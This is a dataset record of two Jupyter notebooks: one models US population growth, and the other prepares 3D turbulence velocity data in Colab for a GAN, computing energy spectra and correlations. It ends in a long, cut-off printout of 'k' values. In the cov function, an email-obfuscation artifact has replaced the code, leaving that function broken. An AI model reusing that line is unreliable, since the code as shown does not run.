ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
65.697368
17,552
0.756192
[ [ [ "# Configure Jupyter so figures appear in the notebook\n%matplotlib inline\n\n# Configure Jupyter to display the assigned value after an assignment\n%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'\n\n# import functions from the modsim.py module\nfrom modsim import *\n\n#from pandas import read_html\n\nimport pandas as pd", "_____no_output_____" ], [ "data = pd.read_csv(\"US_population.csv\",index_col ='year')\npop = data.population /1e6\npop_df = pop", "_____no_output_____" ], [ "pop [1900]", "_____no_output_____" ], [ "plot (pop,':', label ='US Population')\ndecorate(xlabel='Year',\n ylabel='US Population (million)')\nsavefig('figs/proj01-fig01.png')", "Saving figure to file figs/proj01-fig01.png\n" ], [ "t_0 = 1900\nt_gd_start = 1928\nt_gd_end = 1941\nt_norm_start = t_gd_end + 1\nt_norm_end = 2018\nelapsed_time_bgd = t_gd_start - t_0", "_____no_output_____" ], [ "p_0 = pop[t_0]", "_____no_output_____" ], [ "p_gd_start = pop[t_gd_start]", "_____no_output_____" ], [ "deltap_bgd = p_gd_start - p_0", "_____no_output_____" ], [ "growth_rate_bgd = deltap_bgd/elapsed_time_bgd", "_____no_output_____" ], [ "pop_df = pop [(pop.index >= t_0) & (pop.index <= t_gd_start -1)]", "_____no_output_____" ], [ "system = System(t_0 = t_0,\n t_gd_start = t_gd_start,\n t_gd_end = t_gd_end,\n t_norm_start = t_norm_start,\n t_norm_end = t_norm_end,\n p_0 = p_0,\n p_gd_start = p_gd_start,\n growth_rate_bgd = growth_rate_bgd,\n alpha = 0.023,\n beta = 0.00135)", "_____no_output_____" ], [ "def run_simulation (system, update_func):\n results = TimeSeries()\n results[system.t_gd_start] = system.p_gd_start\n \n for t in linrange(system.t_gd_start, system.t_gd_end):\n results[t+1] = update_func(results[t], t, system)\n \n return results", "_____no_output_____" ], [ "def update_func_quad (pop,t,system):\n return pop + growth_rate_bgd\n\nresults = run_simulation (system, update_func_quad)", "_____no_output_____" ], [ "plot (pop_df + results, ':',label = \"US 
pop\")\ndecorate(xlabel='Year',\n ylabel='US Population (million)')\nsavefig('figs/proj01-fig02.png')", "Saving figure to file figs/proj01-fig02.png\n" ], [ "results_df = results.df ()", "_____no_output_____" ], [ "pop_df", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730d9f19cd6ea6678837813b9647c89ae7e35bc
485,701
ipynb
Jupyter Notebook
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
1
2020-03-16T12:17:22.000Z
2020-03-16T12:17:22.000Z
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
null
null
null
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
null
null
null
68.864455
30,428
0.678557
[ [ [ "<a href=\"https://colab.research.google.com/github/ferngonzalezp/turbulence-GAN/blob/master/lstm_gan_isoturb1D.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "%matplotlib inline", "_____no_output_____" ], [ "from __future__ import print_function\n#%matplotlib inline\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom IPython.display import HTML\n\n\n# Set random seem for reproducibility\nmanualSeed = 999\n#manualSeed = random.randint(1, 10000) # use if you want new results\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)", "Random Seed: 999\n" ], [ "buffer_size = 1\nu = np.zeros((buffer_size,128,128,128))\nv = np.zeros((buffer_size,128,128,128))\nw = np.zeros((buffer_size,128,128,128))\nfor i in range(buffer_size):\n u[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/u_cbc_128.128.128_10000_modes.npy' %(i)))\n v[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/v_cbc_128.128.128_10000_modes.npy' %(i)))\n w[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/w_cbc_128.128.128_10000_modes.npy' %(i)))", "_____no_output_____" ], [ "field = torch.tensor((u,v,w),dtype=torch.float32)\nfield = field.transpose(0,1)\nfield.shape", "_____no_output_____" ], [ "!pip install -U -q PyDrive\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials# Authenticate and create the PyDrive client.\nauth.authenticate_user()\ngauth = 
GoogleAuth()\ngauth.credentials = GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)", "_____no_output_____" ], [ "link = 'https://drive.google.com/open?id=14YO19ftGkb0Jm28JGGdHJdE5OeBb8BbP' # The shareable link", "_____no_output_____" ], [ "fluff, id = link.split('=')\n\nprint (id) # Verify that you have everything after '='", "14YO19ftGkb0Jm28JGGdHJdE5OeBb8BbP\n" ], [ "downloaded = drive.CreateFile({'id':id}) \ndownloaded.GetContentFile('tkespec.py') ", "_____no_output_____" ], [ "import tkespec", "_____no_output_____" ], [ "lx = 2*np.pi*9/100\nly = lx\nlz = lx", "_____no_output_____" ], [ "knyquist, wave_numbers, tke_spectrum = tkespec.compute_tke_spectrum(u[0],v[0],w[0],lx,ly,lz,True)", "knorm = 11.111111111111109\n" ], [ "plt.xscale(\"log\")\nplt.plot(wave_numbers,tke_spectrum)", "_____no_output_____" ], [ "def cov(x,y):\n term1 = torch.mean([email protected](1,2),dim=(0,1))\n term2 = torch.mean(x,dim=(0,1))@torch.mean(y,dim=(0,1)).transpose(2,3)\n return term1 - term2", "_____no_output_____" ], [ "def point_corr(x,y):\n vx = x - torch.mean(x)\n vy = y - torch.mean(y)\n\n return torch.mean(vx * vy,dim=(0,1,3)) / (torch.sqrt(torch.mean(vx ** 2, dim=(0,1,3))) * torch.sqrt(torch.mean(vy ** 2,dim=(0,1,3))))", "_____no_output_____" ], [ "def stream_m(x):\n return torch.mean(x, dim=(0,1,3))", "_____no_output_____" ], [ "def rms(x):\n return torch.mean(x**2, dim=(0,1,3))", "_____no_output_____" ], [ "Ruv = point_corr(field[:,0],field[:,1])\nplt.plot(Ruv)", "_____no_output_____" ], [ "stream_mu = stream_m(field[:,0])\nplt.plot(stream_mu)", "_____no_output_____" ], [ "rms_u = rms(field[:,0])\nplt.plot(rms_u)", "_____no_output_____" ] ], [ [ "#Extract 1D signal from flow field", "_____no_output_____" ] ], [ [ "train_sigs = field[:,0].reshape(field.shape[0]*128*128,1,128)", "_____no_output_____" ], [ "plt.plot(train_sigs[np.random.randint(0,train_sigs.shape[0]),0])", "_____no_output_____" ], [ 
"print(torch.mean(train_sigs[:,0]))\nprint(torch.std(train_sigs[:,0]))", "tensor(0.0004)\ntensor(0.2208)\n" ], [ "def auto_cor(v):\n v = v.detach()\n result = 0\n for i in range(v.shape[0]):\n result += np.correlate(v[i],v[i],mode='full')\n result /= v.shape[0]\n result = torch.tensor(result)\n return result/result.max()", "_____no_output_____" ], [ "Ruu = auto_cor(train_sigs[:,0,:])\nplt.plot(Ruu)", "_____no_output_____" ], [ "knyquist, wave_numbers, tke_spectrum = tkespec.compute_tke_spectrum_1d(u[0],lx,ly,lz,True)", "\u001b[1;30;43mStreaming output truncated to the last 5000 lines.\u001b[0m\nk = 41\nk = 40\nk = 40\nk = 40\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 72\nk = 73\nk = 74\nk = 75\nk = 74\nk = 73\nk = 72\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 41\nk = 42\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 
54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 74\nk = 74\nk = 74\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 42\nk = 41\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 70\nk = 71\nk = 72\nk = 73\nk = 74\nk = 73\nk = 72\nk = 71\nk = 70\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 48\nk = 
49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 73\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 
43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 72\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 
38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 71\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 
34\nk = 34\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 30\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 29\nk = 
29\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 
26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 25\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 